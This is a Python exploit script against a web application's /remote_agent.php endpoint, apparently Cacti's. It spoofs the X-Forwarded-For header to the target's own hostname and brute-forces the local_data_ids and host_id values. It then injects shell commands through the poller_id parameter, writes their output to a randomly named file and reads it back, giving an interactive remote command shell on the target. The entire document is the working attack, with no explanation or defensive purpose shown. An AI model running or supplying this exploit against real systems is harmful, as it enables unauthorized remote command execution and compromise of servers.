import requests import sys from urllib.parse import urlparse import random import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) url = sys.argv[1] host = urlparse(url).hostname headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36", "X-Forwarded-For": host} def get_random_str(): return "".join(random.sample('zyxwvutsrqponmlkjihgfedcba', random.randint(5, 9))) def check_success(file_name): res = requests.get(url + "/" + file_name, headers=headers, verify=False) if res.status_code == 200: return res.text return "" def send_payload(poller_id, local_data_ids, host_id): payload = "/remote_agent.php?poller_id={}&action=polldata&local_data_ids[0]={}&host_id={}".format(poller_id, local_data_ids, host_id) try: res = requests.get(url + payload, headers=headers, verify=False) res.json() if res.status_code == 200 and "polling_time" in res.text: return True except Exception as e: pass return False def get_ids(): for i in range(0, 10): for j in range(0, 10): print("Trying... local_data_ids:{} ,host_id:{}".format(i, j)) res = send_payload("1", i, j) if res: return i, j def exploit(cmd, local_data_ids, host_id): file_name = get_random_str() + ".txt" cmd = ";`{} > {}`".format(cmd, file_name) send_payload(cmd, local_data_ids, host_id) res = check_success(file_name) print(res) if __name__ == '__main__': local_data_ids, host_id = get_ids() print("GET local_data_ids:{} ,host_id:{}".format(local_data_ids, host_id)) while True: cmd = input(">> ") if cmd == "exit": break exploit(cmd, local_data_ids, host_id)